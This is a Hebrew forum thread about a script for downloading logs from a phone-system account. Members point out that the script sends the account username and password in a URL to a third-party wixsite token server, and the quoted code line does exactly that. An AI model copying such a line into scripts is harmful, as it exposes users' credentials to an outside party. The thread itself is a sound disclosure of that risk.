הורדת לוג מהמערכת
-
פוסט זה נמחק! -
@י-ע
בטור של סוג הקובץ יש טעות ברשימה הנפתחת -
@אA תגרור את ההגדרה עד למטה....
-
@י-ע
זה אצלי.
רק הערתי למקור שהבאת שאחרים שלא ידעו לא יתקעו.
יישר כח!! -
@אA
עודכן..... -
@עידו כתב בהורדת לוג מהמערכת:
אנ ירק אומר שכחלק מפעולת הסקריפט הסיסמא והמספר נשלחים לשרת של כותב ההודעה שם לצורך יצירת טוקן
לא נכון, תעבור על הפוסט שלי שם שוב
-
@פלמנמוני כתב בהורדת לוג מהמערכת:
@עידו כתב בהורדת לוג מהמערכת:
אנ ירק אומר שכחלק מפעולת הסקריפט הסיסמא והמספר נשלחים לשרת של כותב ההודעה שם לצורך יצירת טוקן
לא נכון, תעבור על הפוסט שלי שם שוב
כמדומני, או שזה כבר לא פעיל?
var tokenUrl = "https://noam66515.wixsite.com/token-yemot/_functions/call2allApi" + "?username=" + encodeURIComponent(username) + "&password=" + encodeURIComponent(password); var tokenResponse = UrlFetchApp.fetch(tokenUrl); -
@עידו כתב בהורדת לוג מהמערכת:
כמדומני
זה לא שרת שלי, אלא שרת שפורסם פה בפורום בעבר לצורך יצירת טוקן לגוגל סקריפט שמספר מערכת: סיסמא לא עבד בו בעבר, כיון ניתן באמת למחוק את זה
-
@פלמנמוני אהה אוקיי.
קבל התנצלותי
אז כדאי לציין שזה מגיע לשרת של מישהו...
-
שלום! נראה שהשיחה הזו מעניינת אותך, אבל עדיין אין לך חשבון.
נמאס לכם לגלול בין אותם הפוסטים בכל ביקור? כשנרשמים לחשבון, תמיד תחזרו בדיוק למקום שבו הייתם קודם, ותוכלו לבחור לקבל התראות על תגובות חדשות (בין אם במייל, ובין אם בהתראת פוש). תוכלו גם לשמור סימניות ולפרגן ב-upvote לפוסטים כדי להביע הערכה לחברי קהילה אחרים.
בעזרת התרומה שלך, הפוסט הזה יכול להיות אפילו טוב יותר 💗
הרשמה התחברות